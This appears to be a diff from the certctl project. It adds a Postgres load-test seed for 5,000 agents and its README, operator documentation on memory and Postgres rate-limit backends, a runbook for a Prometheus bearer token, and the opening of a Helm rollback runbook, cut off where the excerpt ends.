|
-- Volume target: 5,000 rows. The agents schema is much narrower than
|
||||||
|
-- managed_certificates so the insert is sub-second on the loadtest
|
||||||
|
-- stack. The 5K agents do not own any deployment_targets in this
|
||||||
|
-- fixture (the scenario only measures the heartbeat hot path, not
|
||||||
|
-- the work-poll path which depends on cert + target wiring).
|
||||||
|
--
|
||||||
|
-- Phase 8 entry point — runs only when the loadtest compose stack is
|
||||||
|
-- explicitly opted into the scale-seed via LOADTEST_SCALE_SEED=true.
|
||||||
|
|
||||||
|
-- Insert 5,000 loadtest agents in a single statement. The derived
-- table computes the zero-padded sequence suffix once per row; id,
-- name and hostname all share it.
INSERT INTO agents (
    id,
    name,
    hostname,
    status,
    last_heartbeat_at,
    registered_at,
    api_key_hash,
    os,
    architecture,
    ip_address,
    version
)
SELECT
    'ag-loadtest-' || fleet.suffix,
    'loadtest-agent-' || fleet.suffix,
    'loadtest-' || fleet.suffix || '.fleet.example.test',
    'Online',
    -- Last heartbeat staggered over the prior 0-59 seconds (about 2x
    -- the agent's native 30s interval) rather than one shared
    -- timestamp.
    NOW() - ((fleet.n % 60) || ' seconds')::interval,
    -- Registration age spread deterministically over 1-90 days.
    NOW() - ((fleet.n % 90 + 1) || ' days')::interval,
    'loadtest_no_auth',
    -- OS mix: 10% windows, 10% darwin, 80% linux, so the OS
    -- distribution column on the agents page isn't pure-linux.
    CASE
        WHEN fleet.n % 10 = 0 THEN 'windows'
        WHEN fleet.n % 10 = 1 THEN 'darwin'
        ELSE 'linux'
    END,
    -- Architecture mix: 20% arm64, 80% amd64.
    CASE fleet.n % 5 WHEN 0 THEN 'arm64' ELSE 'amd64' END,
    -- IPv4 inside 10.42.0.0/16, deterministic per sequence number.
    '10.42.' || ((fleet.n / 256) % 256)::text || '.' || (fleet.n % 256)::text,
    '2.1.0'
FROM (
    SELECT
        n,
        lpad(n::text, 5, '0') AS suffix
    FROM generate_series(1, 5000) AS series(n)
) AS fleet
-- Re-running against an already-seeded DB skips rows whose id exists.
ON CONFLICT (id) DO NOTHING;
|
||||||
|
|
||||||
|
-- Post-insert confirmation. Emits a NOTICE with the number of seeded
-- agents, matched by id prefix.
DO $$
DECLARE
    seeded_rows integer;
BEGIN
    seeded_rows := (
        SELECT COUNT(*)
        FROM agents
        WHERE id LIKE 'ag-loadtest-%'
    );
    RAISE NOTICE 'Phase 8 agent-storm seed: % agents rows present', seeded_rows;
END $$;
|
||||||
@@ -0,0 +1,87 @@
|
|||||||
|
# Phase 8 load-test seed fixtures
|
||||||
|
|
||||||
|
Opt-in seed scripts that grow the loadtest DB from the demo-scale
|
||||||
|
fixture (~15 certs / ~10 agents from `migrations/seed_demo.sql`) to
|
||||||
|
fleet scale (10K certs + 5K agents) so the Phase 8 SCALE-H2 scenarios
|
||||||
|
measure something representative.
|
||||||
|
|
||||||
|
## When these run
|
||||||
|
|
||||||
|
The default `make loadtest` path does NOT touch this directory — the
|
||||||
|
API tier and connector tier scenarios run against the demo seed alone
|
||||||
|
and complete in ~5 minutes. The Phase 8 scenarios opt-in via the
|
||||||
|
`LOADTEST_SCALE_SEED=true` environment variable; when set, the
|
||||||
|
`certctl-loadtest-scale-seed` one-shot init container runs every
|
||||||
|
`*.sql` file in this directory in lexical order against the same
|
||||||
|
Postgres instance the server uses.
|
||||||
|
|
||||||
|
Compose service wiring (see `../docker-compose.yml`):
|
||||||
|
- Service: `scale-seed`
|
||||||
|
- Profile: `scale-seed` (compose `profiles:` gate; not started by
|
||||||
|
default)
|
||||||
|
- Depends on: `postgres` (service_healthy) AND `certctl-server`
|
||||||
|
(service_healthy — server runs schema migrations at boot so the
|
||||||
|
seed runs AFTER tables exist)
|
||||||
|
- Order: lexical (`01_bulk_renewal_certs.sql` then
|
||||||
|
`02_agent_fleet.sql`)
|
||||||
|
- Idempotent: every script uses `ON CONFLICT DO NOTHING` so re-running
|
||||||
|
is a no-op.
|
||||||
|
|
||||||
|
## What gets seeded
|
||||||
|
|
||||||
|
| File | Rows | Purpose |
|
||||||
|
|---|---|---|
|
||||||
|
| `01_bulk_renewal_certs.sql` | 10,000 managed_certificates | Fleet shape for `bulk_renewal.js`. All linked to demo FKs (iss-local, o-alice, t-platform, rp-standard). Status `active`, expires_at distributed across the next 30 days so a 30-day renewal window considers every row eligible. Name prefix `loadtest-bulk-` marks the seeded set (the seed's confirmation count matches on it); `bulk_renewal.js` itself scopes its bulk-renew criteria by `team_id` + `issuer_id`. |
|
||||||
|
| `02_agent_fleet.sql` | 5,000 agents | Fleet shape for `agent_storm.js`. Status `Online`, last_heartbeat_at staggered across prior 60s, name prefix `loadtest-agent-`. OS distribution: 80% linux / 10% windows / 10% darwin. Arch: 80% amd64 / 20% arm64. |
|
||||||
|
|
||||||
|
## How to run the Phase 8 scenarios locally
|
||||||
|
|
||||||
|
```bash
|
||||||
|
cd deploy/test/loadtest
|
||||||
|
LOADTEST_SCALE_SEED=true docker compose --profile scale-seed up --build \
|
||||||
|
--abort-on-container-exit --exit-code-from k6-scale
|
||||||
|
```
|
||||||
|
|
||||||
|
Or via the dedicated Makefile target (preferred for CI parity):
|
||||||
|
|
||||||
|
```bash
|
||||||
|
make loadtest-scale
|
||||||
|
```
|
||||||
|
|
||||||
|
## Why SQL fixtures instead of a Go seed binary
|
||||||
|
|
||||||
|
- The certctl-server already boots from a clean DB and runs migrations
|
||||||
|
+ `seed_demo.sql` when `CERTCTL_DEMO_SEED=true`. Adding a third seed
|
||||||
|
mode (loadtest-scale) would mean either a new
|
||||||
|
`CERTCTL_LOADTEST_SEED` flag wired into `cmd/server/main.go` (cross-
|
||||||
|
cutting change for one test path) or a separate seed binary (more
|
||||||
|
compose surface).
|
||||||
|
- Raw SQL is the smallest viable change: each script is a single
|
||||||
|
multi-row `INSERT … SELECT FROM generate_series(…)` plus a
|
||||||
|
`DO $$ … RAISE NOTICE` confirmation block.
|
||||||
|
- Idempotency is straightforward via `ON CONFLICT … DO NOTHING` — the
|
||||||
|
same pattern `seed_demo.sql` uses.
|
||||||
|
|
||||||
|
## Why these volumes specifically
|
||||||
|
|
||||||
|
- **10K certs.** The SCALE-H2 audit asked for "10K certs with
|
||||||
|
renewal_at < now." Round number, fits in postgres:16-alpine on a
|
||||||
|
CI runner without OOM, and large enough that the renewal selector's
|
||||||
|
query plan is exercised (the demo's 15 rows would index-scan
|
||||||
|
trivially).
|
||||||
|
- **5K agents.** Heartbeat at 30s cadence = ~167 heartbeats/sec
|
||||||
|
sustained. That's well above the 50 req/s the existing API tier
|
||||||
|
measures and stresses the agent.heartbeat handler's per-call cost
|
||||||
|
(last_heartbeat_at UPDATE + the RBAC permission check + the
|
||||||
|
audit-log row).
|
||||||
|
|
||||||
|
If a future scenario needs more rows (50K certs / 10K agents), add a
|
||||||
|
new `03_…sql` here and another scenario file. Don't grow the existing
|
||||||
|
files — re-running existing scenarios against a different fixture
|
||||||
|
shape would invalidate the captured baseline.
|
||||||
|
|
||||||
|
## Phase 8 audit reference
|
||||||
|
|
||||||
|
Source finding: SCALE-H2 in
|
||||||
|
`cowork/certctl-architecture-diligence-audit.html`.
|
||||||
|
Phase 8 closure commit: see `git log --grep='Phase 8'`.
|
||||||
+128
-38
@@ -121,52 +121,142 @@ explicitly scrubs the password before it reaches the audit subsystem
|
|||||||
(see [`docs/operator/auth-threat-model.md`](auth-threat-model.md) §
|
(see [`docs/operator/auth-threat-model.md`](auth-threat-model.md) §
|
||||||
"Break-glass token leak").
|
"Break-glass token leak").
|
||||||
|
|
||||||
## Rate-limit behavior under restarts and replicas
|
## Rate-limit behavior — configurable backend (memory or postgres)
|
||||||
|
|
||||||
Where rate limits exist, they are **per-process, in-memory,
|
The sliding-window-log rate limiters used across certctl's
|
||||||
reset-on-restart, and not shared across replicas**. This matters for
|
authenticated-but-shared-credential code paths (break-glass login,
|
||||||
multi-replica deployments and for any compliance posture that asks
|
OCSP per-IP, cert-export per-actor, EST per-principal, EST
|
||||||
"what limits apply globally vs per-pod."
|
failed-basic source-IP) carry a **configurable backend**. The
|
||||||
|
operator picks between two implementations via
|
||||||
|
`CERTCTL_RATE_LIMIT_BACKEND`:
|
||||||
|
|
||||||
|
| Value | When to use |
|
||||||
|
|------------|------------------------------------------------------|
|
||||||
|
| `memory` | Default. Single-replica deploys; sketchpad / dev. |
|
||||||
|
| `postgres` | HA deploys (`server.replicas > 1`). Cross-replica-consistent. |
|
||||||
|
|
||||||
|
Phase 13 Sprint 13.2/13.3 (architecture diligence audit ARCH-M1
|
||||||
|
closure) replaced the prior single-process limitation with a
|
||||||
|
substantive close: when the operator opts into `postgres`, all
|
||||||
|
replicas share the same
|
||||||
|
`rate_limit_buckets` table (migration 000046) and per-key access is
|
||||||
|
arbitrated via `SELECT FOR UPDATE` row locks. A 3-replica cluster
|
||||||
|
hitting one rate-limited endpoint concurrently sees exactly the
|
||||||
|
configured cap succeed across the cluster — not 3× the cap as the
|
||||||
|
old per-process backend would have allowed.
|
||||||
|
|
||||||
|
### Operator decision tree
|
||||||
|
|
||||||
|
```
|
||||||
|
Single replica (server.replicas = 1, the helm chart default)?
|
||||||
|
└─ Use CERTCTL_RATE_LIMIT_BACKEND=memory (the default; no action
|
||||||
|
required). Bucket lookups stay in-process; zero DB round-trips
|
||||||
|
on the hot path.
|
||||||
|
|
||||||
|
Two or more replicas?
|
||||||
|
└─ Use CERTCTL_RATE_LIMIT_BACKEND=postgres. Two extra DB round-trips
|
||||||
|
per Allow call (BEGIN ... SELECT FOR UPDATE ... UPDATE ... COMMIT);
|
||||||
|
acceptable on the gated hot path. The Sprint 13.2 multi-replica
|
||||||
|
integration test pins exactly-cap enforcement across N replicas
|
||||||
|
as the closure proof.
|
||||||
|
```
|
||||||
|
|
||||||
### Inventory
|
### Inventory
|
||||||
|
|
||||||
| Limiter | Scope | Window | Cap | Survives restart? | Shared across replicas? |
|
| Limiter | Scope | Window | Cap |
|
||||||
|---|---|---|---|---|---|
|
|---|---|---|---|
|
||||||
| Break-glass login (per source-IP) | `internal/api/handler/auth_breakglass.go` | 60s | 5 attempts | No | No |
|
| Break-glass login (per source-IP) | `internal/api/handler/auth_breakglass.go` | 60s | 5 attempts |
|
||||||
| SCEP/Intune per-device challenge | `internal/scep/intune/` | 60s | configurable (`*_PER_MINUTE`) | No | No |
|
| OCSP query (per source-IP) | `internal/api/handler/certificates.go` | 60s | configurable (`CERTCTL_OCSP_RATE_LIMIT_PER_IP_MIN`) |
|
||||||
| EST per-principal CSR enrollment | `internal/est/` | 60s | configurable | No | No |
|
| Cert export (per actor) | `internal/api/handler/export.go` | 1h | configurable (`CERTCTL_CERT_EXPORT_RATE_LIMIT_PER_ACTOR_HR`) |
|
||||||
| EST HTTP-Basic source-IP failed-auth | `internal/est/` | 60s | configurable | No | No |
|
| EST per-principal CSR enrollment | `internal/api/handler/est.go` | 24h | configurable (per-profile `RateLimitPerPrincipal24h`) |
|
||||||
| ACME per-account orders / key-change / challenge-respond | `internal/service/acme.go` | 1h | configurable | No | No |
|
| EST HTTP-Basic source-IP failed-auth | `internal/api/handler/est.go` | 60m | 10 attempts |
|
||||||
|
| SCEP/Intune per-device challenge | `internal/scep/intune/` | 60s | configurable (`*_PER_MINUTE`) |
|
||||||
|
| ACME per-account orders / key-change / challenge-respond | `internal/service/acme.go` | 1h | configurable |
|
||||||
|
|
||||||
All five use the shared `internal/ratelimit/sliding_window.go`
|
The `CERTCTL_RATE_LIMIT_BACKEND` selector applies to the first five
|
||||||
primitive. Buckets live in a single per-process map guarded by a
|
(the cmd/server-wired limiters). The SCEP/Intune wrapper + the ACME
|
||||||
mutex; the package-level cap prevents unbounded growth under
|
per-account limiter ride their own internal accounting today; both
|
||||||
adversarial key cardinality (default 100,000 keys; oldest-by-newest-
|
are tracked as follow-ups in WORKSPACE-ROADMAP.md.
|
||||||
timestamp evicted under pressure).
|
|
||||||
|
|
||||||
### Implications for multi-replica deployments
|
### Backend internals
|
||||||
|
|
||||||
- **Effective per-replica cap is the documented cap.** A 2-replica
|
Both backends share the algorithm: sliding-window log + per-key
|
||||||
deployment lets through up to 2× the per-key window cap before
|
bucket + prune-on-Allow.
|
||||||
either replica rejects.
|
|
||||||
- **Restart resets the bucket.** A `kubectl rollout restart` empties
|
|
||||||
the in-memory windows on every replica. An attacker who notices
|
|
||||||
this could in principle re-issue burst attempts after every roll;
|
|
||||||
the threat model accepts this because rollouts are operator-driven
|
|
||||||
and the relevant endpoints already require credentials.
|
|
||||||
- **No cross-replica fan-out.** Rate-limit decisions on replica A
|
|
||||||
are not visible to replica B. Sticky-session ingress routing (with
|
|
||||||
`service.spec.sessionAffinity: ClientIP` on Kubernetes or the
|
|
||||||
equivalent on your load balancer) tightens the effective cap to
|
|
||||||
per-replica + per-source-IP rather than per-replica + per-source-IP
|
|
||||||
for whichever pod the request happened to land on.
|
|
||||||
|
|
||||||
If your threat model requires globally-enforced rate limits across
|
**Memory backend (`memory`)** — per-process map keyed by bucket key;
|
||||||
replicas, the implementation surface is roughly: swap the per-process
|
mutex-guarded; package-level LRU cap prevents unbounded growth under
|
||||||
map for a database-backed sliding window (or a Redis-backed equivalent
|
adversarial key cardinality (default 100,000 keys per limiter
|
||||||
if you already run Redis). This is on the
|
instance; oldest-by-newest-timestamp evicted under pressure).
|
||||||
[WORKSPACE-ROADMAP.md](../../WORKSPACE-ROADMAP.md) as a v3 item;
|
Implemented at `internal/ratelimit/sliding_window.go`.
|
||||||
nothing in the certctl threat model today requires it.
|
|
||||||
|
**Postgres backend (`postgres`)** — same algorithm against the
|
||||||
|
`rate_limit_buckets` table:
|
||||||
|
|
||||||
|
```sql
|
||||||
|
CREATE TABLE rate_limit_buckets (
|
||||||
|
bucket_key TEXT PRIMARY KEY,
|
||||||
|
timestamps TIMESTAMPTZ[] NOT NULL DEFAULT '{}',
|
||||||
|
updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW()
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
`Allow(key, now)` opens a transaction, ensures the row exists
|
||||||
|
(`INSERT ... ON CONFLICT DO NOTHING`), acquires the row lock
|
||||||
|
(`SELECT ... FOR UPDATE`), prunes timestamps older than `now-window`,
|
||||||
|
compares the post-prune count against `maxN`, conditionally appends
|
||||||
|
`now`, persists, and commits. The row lock is what arbitrates across
|
||||||
|
replicas: replicas A and B firing simultaneous `Allow("k")` never
|
||||||
|
race because Postgres serializes the per-key row update across the
|
||||||
|
cluster. Implemented at
|
||||||
|
`internal/ratelimit/postgres_sliding_window.go`.
|
||||||
|
|
||||||
|
### Janitor sweep (postgres backend only)
|
||||||
|
|
||||||
|
The scheduler runs a `rate_limit_buckets` janitor every
|
||||||
|
`CERTCTL_RATE_LIMIT_JANITOR_INTERVAL` (default 5m, minimum 1m). The
|
||||||
|
sweep deletes rows whose `updated_at` is older than the longest
|
||||||
|
configured window any limiter uses (24h today, matching the EST
|
||||||
|
per-principal limiter). Idempotent; repeated sweeps find zero rows.
|
||||||
|
The memory backend's prune-on-Allow path keeps buckets short-lived
|
||||||
|
without a separate sweep, so the loop is a no-op when
|
||||||
|
`backend=memory`.
|
||||||
|
|
||||||
|
### Falsifiable closure proof
|
||||||
|
|
||||||
|
The Phase 13 Sprint 13.2 integration test
|
||||||
|
`internal/integration/ratelimit_multi_replica_test.go`
|
||||||
|
(`//go:build integration`) fires 100 concurrent `Allow("test-key")`
|
||||||
|
calls round-robined across 3 independent `PostgresSlidingWindowLimiter`
|
||||||
|
instances sharing one Postgres database (`cap=10`, `window=1m`) and
|
||||||
|
asserts exactly 10 succeed + 90 return `ErrRateLimited`. If the
|
||||||
|
cross-replica row lock weren't arbitrating, each replica would
|
||||||
|
independently let through ~3-4 requests, giving 12-15 successes
|
||||||
|
total. Re-run:
|
||||||
|
|
||||||
|
```
|
||||||
|
go test -tags=integration -count=1 -run TestRateLimit_MultiReplica \
|
||||||
|
./internal/integration/...
|
||||||
|
```
|
||||||
|
|
||||||
|
### Helm chart wiring
|
||||||
|
|
||||||
|
The helm chart at `deploy/helm/certctl/` exposes the backend via
|
||||||
|
`server.rateLimiting.backend` (default `memory`). To opt into the
|
||||||
|
postgres backend for an HA deploy:
|
||||||
|
|
||||||
|
```
|
||||||
|
helm upgrade --install certctl deploy/helm/certctl \
|
||||||
|
--set server.replicas=3 \
|
||||||
|
--set server.rateLimiting.backend=postgres \
|
||||||
|
--set server.rateLimiting.janitorInterval=5m
|
||||||
|
```
|
||||||
|
|
||||||
|
`server.replicas > 1` without flipping `backend` to `postgres` works
|
||||||
|
fine — the limits stay per-process — but the operator gets a 2× /
|
||||||
|
3× / N× effective cap depending on replica count. The chart does NOT
|
||||||
|
auto-flip on `replicas > 1` because some HA deploys deliberately want
|
||||||
|
per-process limits (sticky-session ingress + tight per-replica caps
|
||||||
|
to detect bot traffic at the edge before it hits the application).
|
||||||
|
|
||||||
### Where these numbers live
|
### Where these numbers live
|
||||||
|
|
||||||
|
|||||||
@@ -0,0 +1,243 @@
|
|||||||
|
# Runbook: Prometheus bearer token for the metrics scrape endpoint
|
||||||
|
|
||||||
|
> Last reviewed: 2026-05-14
|
||||||
|
|
||||||
|
Use this when:
|
||||||
|
- You're enabling Prometheus Operator scraping via the Helm chart's
|
||||||
|
`monitoring.serviceMonitor.enabled` toggle.
|
||||||
|
- Your Prometheus scrapes are returning 401 against
|
||||||
|
`/api/v1/metrics/prometheus`.
|
||||||
|
- An auditor asks "how is the metrics endpoint authenticated?"
|
||||||
|
|
||||||
|
## The constraint
|
||||||
|
|
||||||
|
The certctl server exposes Prometheus metrics at
|
||||||
|
`/api/v1/metrics/prometheus`. This endpoint is **RBAC-gated on the
|
||||||
|
`metrics.read` permission** (per `internal/api/router/router.go`).
|
||||||
|
Like every other gated handler, it requires an authenticated actor
|
||||||
|
holding that permission — there is no anonymous-scrape path.
|
||||||
|
|
||||||
|
The rationale: the metrics payload includes operational counters
|
||||||
|
(cert counts by status, agent counts, issuance failure rates) that
|
||||||
|
a public-facing observer should not see. Most certctl deployments
|
||||||
|
expose a reverse proxy / load balancer to the wider network; the
|
||||||
|
auth gate on `/api/v1/metrics/prometheus` prevents an external
|
||||||
|
observer from learning operational state via the metrics endpoint
|
||||||
|
even when the proxy itself is reachable.
|
||||||
|
|
||||||
|
## What you need to set up
|
||||||
|
|
||||||
|
Three pieces:
|
||||||
|
|
||||||
|
1. **An API key with `metrics.read` permission** (and only that
|
||||||
|
permission — least-privilege).
|
||||||
|
2. **A Kubernetes Secret** holding that API key.
|
||||||
|
3. **`monitoring.serviceMonitor.bearerTokenSecret`** in the chart's
|
||||||
|
values pointing at the Secret.
|
||||||
|
|
||||||
|
## Step 1: Create the metrics-read role + API key
|
||||||
|
|
||||||
|
The chart's seed migration ships a `metrics-read` role-template, but
|
||||||
|
some operators want a dedicated identity per scrape source. Both
|
||||||
|
approaches work; the dedicated-identity path is below.
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Bootstrap or impersonate a session with auth.role.assign +
|
||||||
|
# auth.apikey.create permissions (admin actor is fine).
|
||||||
|
|
||||||
|
# 2. Create a role with only metrics.read.
|
||||||
|
curl -sS --cacert ./ca.crt -X POST \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
-H "Content-Type: application/json" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/roles \
|
||||||
|
-d '{"id":"r-prometheus-scrape","name":"Prometheus scrape","permissions":["metrics.read"]}'
|
||||||
|
|
||||||
|
# 3. Create an actor that holds the role.
|
||||||
|
curl -sS --cacert ./ca.crt -X POST \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
-H "Content-Type: application/json" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/actors \
|
||||||
|
-d '{"id":"actor-prometheus","name":"Prometheus scrape","roles":["r-prometheus-scrape"]}'
|
||||||
|
|
||||||
|
# 4. Mint an API key for the actor. The response includes a
|
||||||
|
# `key_value` field that's only returned ONCE — capture it.
|
||||||
|
curl -sS --cacert ./ca.crt -X POST \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
-H "Content-Type: application/json" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/apikeys \
|
||||||
|
-d '{"actor_id":"actor-prometheus","name":"prometheus-scrape-token"}' \
|
||||||
|
| tee /tmp/prom-key.json
|
||||||
|
|
||||||
|
# Extract just the secret material:
|
||||||
|
jq -r '.key_value' /tmp/prom-key.json
|
||||||
|
```
|
||||||
|
|
||||||
|
The mint endpoint returns the API key plaintext exactly once. The
|
||||||
|
server stores only a constant-time-comparable hash; if you lose the
|
||||||
|
key value, mint a new one.
|
||||||
|
|
||||||
|
## Step 2: Create the Kubernetes Secret
|
||||||
|
|
||||||
|
```bash
|
||||||
|
NAMESPACE=certctl
|
||||||
|
API_KEY=$(jq -r '.key_value' /tmp/prom-key.json)
|
||||||
|
|
||||||
|
kubectl create secret generic certctl-prometheus-key \
|
||||||
|
-n "$NAMESPACE" \
|
||||||
|
--from-literal=api-key="$API_KEY"
|
||||||
|
```
|
||||||
|
|
||||||
|
Now scrub the temporary file:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
shred -u /tmp/prom-key.json
|
||||||
|
```
|
||||||
|
|
||||||
|
## Step 3: Wire the Secret into the chart values
|
||||||
|
|
||||||
|
In your `values.yaml` (or `--set` overrides):
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
monitoring:
|
||||||
|
enabled: true
|
||||||
|
serviceMonitor:
|
||||||
|
enabled: true
|
||||||
|
interval: 30s
|
||||||
|
scrapeTimeout: 10s
|
||||||
|
bearerTokenSecret:
|
||||||
|
name: certctl-prometheus-key
|
||||||
|
key: api-key
|
||||||
|
```
|
||||||
|
|
||||||
|
Re-apply the chart:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
helm upgrade certctl . -n "$NAMESPACE" --reuse-values -f values.yaml
|
||||||
|
```
|
||||||
|
|
||||||
|
The rendered ServiceMonitor will now include the `bearerTokenSecret`
|
||||||
|
block. Prometheus Operator's reconciler picks it up and injects the
|
||||||
|
bearer token into the scrape request.
|
||||||
|
|
||||||
|
## Verification
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Confirm the ServiceMonitor renders with the secret reference
|
||||||
|
kubectl get servicemonitor -n "$NAMESPACE" certctl-server -o yaml \
|
||||||
|
| grep -A2 bearerTokenSecret
|
||||||
|
|
||||||
|
# Expected:
|
||||||
|
# bearerTokenSecret:
|
||||||
|
# name: certctl-prometheus-key
|
||||||
|
# key: api-key
|
||||||
|
|
||||||
|
# 2. Tail the certctl-server logs for the next ~60 seconds (two
|
||||||
|
# Prometheus scrape intervals at the 30s set above). Look for incoming GET /api/v1/metrics/prometheus
|
||||||
|
# requests authenticated successfully — no 401s.
|
||||||
|
kubectl logs -n "$NAMESPACE" -l app.kubernetes.io/component=server \
|
||||||
|
--tail=100 -f | grep -E "GET /api/v1/metrics/prometheus|metrics-scrape"
|
||||||
|
|
||||||
|
# 3. From the Prometheus UI's "Targets" page, the certctl-server
|
||||||
|
# target should be UP and last-scrape-error empty. If it's
|
||||||
|
# showing 401, the bearer token isn't reaching the request — see
|
||||||
|
# troubleshooting below.
|
||||||
|
```
|
||||||
|
|
||||||
|
## Troubleshooting
|
||||||
|
|
||||||
|
### Prometheus target shows 401
|
||||||
|
|
||||||
|
Three possible causes:
|
||||||
|
|
||||||
|
1. **Wrong Secret name / key.** Run
|
||||||
|
`kubectl get secret -n "$NAMESPACE" certctl-prometheus-key -o yaml`
|
||||||
|
and confirm the `data.api-key` field exists with a base64-encoded
|
||||||
|
non-empty value. The Secret's data field name must match the
|
||||||
|
`bearerTokenSecret.key` value in `monitoring.serviceMonitor`.
|
||||||
|
2. **API key doesn't have `metrics.read`.** Hit the gating endpoint
|
||||||
|
manually from inside the cluster with the same key:
|
||||||
|
```bash
|
||||||
|
kubectl run --rm -it --image=curlimages/curl debug -- \
|
||||||
|
curl -sS -H "Authorization: Bearer <API_KEY>" \
|
||||||
|
https://certctl-server.certctl.svc.cluster.local:8443/api/v1/metrics/prometheus
|
||||||
|
```
|
||||||
|
A 401 here means the key itself was rejected (wrong, truncated, or revoked value). A 403
|
||||||
|
means the key authenticated but its actor does not hold `metrics.read`.
|
||||||
|
3. **TLS verification failure (not a 401, but masquerading as one in
|
||||||
|
Prometheus's logs).** The default ServiceMonitor template sets
|
||||||
|
`insecureSkipVerify: true` to support demos — production deploys
|
||||||
|
should set `tlsConfig.caFile` or `tlsConfig.ca.secret` per the
|
||||||
|
ServiceMonitor docs.
|
||||||
|
|
||||||
|
### Prometheus target shows TLS errors
|
||||||
|
|
||||||
|
`monitoring.serviceMonitor.tlsConfig` overrides the default. Three
|
||||||
|
patterns:
|
||||||
|
|
||||||
|
```yaml
|
||||||
|
# Pattern 1: trust the system CA bundle (production behind a real CA)
|
||||||
|
tlsConfig:
|
||||||
|
caFile: /etc/ssl/certs/ca-certificates.crt
|
||||||
|
serverName: certctl.your-org.example
|
||||||
|
|
||||||
|
# Pattern 2: trust a CA from a Secret mounted by Prometheus Operator
|
||||||
|
tlsConfig:
|
||||||
|
ca:
|
||||||
|
secret:
|
||||||
|
name: certctl-ca
|
||||||
|
key: ca.crt
|
||||||
|
serverName: certctl.your-org.example
|
||||||
|
|
||||||
|
# Pattern 3: skip verification (DEMO ONLY — DO NOT USE IN PRODUCTION)
|
||||||
|
tlsConfig:
|
||||||
|
insecureSkipVerify: true
|
||||||
|
```
|
||||||
|
|
||||||
|
The certctl server's self-signed bootstrap cert (default
|
||||||
|
`server.tls.existingSecret` from the chart) presents a CN of
|
||||||
|
`certctl-server`. If your `serverName` doesn't match, the scrape
|
||||||
|
fails with `x509: certificate is valid for certctl-server, not ...`.
|
||||||
|
|
||||||
|
## Rotation
|
||||||
|
|
||||||
|
API keys are constant-time-compared, stored hashed, and never
|
||||||
|
logged. Rotation:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# 1. Mint a new key (same actor + role)
|
||||||
|
curl -sS --cacert ./ca.crt -X POST \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
-H "Content-Type: application/json" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/apikeys \
|
||||||
|
-d '{"actor_id":"actor-prometheus","name":"prometheus-scrape-token-v2"}' \
|
||||||
|
| tee /tmp/prom-key-new.json
|
||||||
|
|
||||||
|
# 2. Update the Secret in place
|
||||||
|
kubectl create secret generic certctl-prometheus-key \
|
||||||
|
-n certctl \
|
||||||
|
--from-literal=api-key="$(jq -r '.key_value' /tmp/prom-key-new.json)" \
|
||||||
|
--dry-run=client -o yaml | kubectl apply -f -
|
||||||
|
|
||||||
|
# 3. Wait one scrape interval; verify the next scrape uses the new key.
|
||||||
|
|
||||||
|
# 4. Revoke the old key
|
||||||
|
curl -sS --cacert ./ca.crt -X DELETE \
|
||||||
|
-H "Authorization: Bearer ${ADMIN_API_KEY}" \
|
||||||
|
https://certctl.your-org.example/api/v1/auth/apikeys/<OLD_KEY_ID>
|
||||||
|
|
||||||
|
# 5. Scrub the temp file
|
||||||
|
shred -u /tmp/prom-key-new.json
|
||||||
|
```
|
||||||
|
|
||||||
|
Prometheus Operator picks up Secret changes automatically — no
|
||||||
|
ServiceMonitor edit needed, no Prometheus restart.
|
||||||
|
|
||||||
|
## Related reading
|
||||||
|
|
||||||
|
- [`docs/operator/rbac.md`](../rbac.md) — the full RBAC primitive,
|
||||||
|
permission catalogue, and role-assignment workflow.
|
||||||
|
- [`docs/operator/security.md`](../security.md) — the broader auth
|
||||||
|
posture including the API key / OIDC / break-glass paths.
|
||||||
|
- [`docs/operator/auth-threat-model.md`](../auth-threat-model.md) —
|
||||||
|
why `/api/v1/metrics/prometheus` is gated, and what an
|
||||||
|
unauthenticated leak of metrics data would reveal.
|
||||||
@@ -0,0 +1,193 @@
|
|||||||
|
# Runbook: Helm rollback for certctl
|
||||||
|
|
||||||
|
> Last reviewed: 2026-05-14
|
||||||
|
|
||||||
|
Use this when:
|
||||||
|
- A `helm upgrade` rolled out a bad release and the operator wants to
|
||||||
|
return to the previous working state.
|
||||||
|
- A schema migration shipped a change the operator wants to back out.
|
||||||
|
- An emergency change needs reverting and forward-fix isn't yet
|
||||||
|
available.
|
||||||
|
|
||||||
|
This page covers `helm rollback` mechanics + the cases where
|
||||||
|
rollback is NOT enough on its own (schema migrations are the main
|
||||||
|
one).
|
||||||
|
|
||||||
|
## What `helm rollback` does
|
||||||
|
|
||||||
|
`helm rollback <release> [revision]` re-applies the manifests from a
|
||||||
|
previous Helm revision. It re-creates / updates Kubernetes objects to
|
||||||
|
match that revision's template output and is safe for:
|
||||||
|
|
||||||
|
- **Deployment image bumps:** rolls the container image back to the
|
||||||
|
previous tag. Pods restart with the old image.
|
||||||
|
- **ConfigMap / Secret content changes:** old values land in the
|
||||||
|
config; pods that consume them via `envFrom` or volume mounts get
|
||||||
|
the prior values on the next restart.
|
||||||
|
- **Resource requests / limits / replica count:** the spec changes
|
||||||
|
back to the prior values. Kubernetes reschedules pods accordingly.
|
||||||
|
- **Service / Ingress / NetworkPolicy changes:** networking flips
|
||||||
|
back to the previous shape immediately.
|
||||||
|
|
||||||
|
## What `helm rollback` does NOT do
|
||||||
|
|
||||||
|
The Kubernetes layer is reversible; the **database schema is not**.
|
||||||
|
This is the single most common gap in a rollback plan.
|
||||||
|
|
||||||
|
### Schema migrations are forward-only by design
|
||||||
|
|
||||||
|
certctl's migrations under `migrations/` are numbered up-migrations
|
||||||
|
(`NNNNNN_*.up.sql`) with paired down-migrations
|
||||||
|
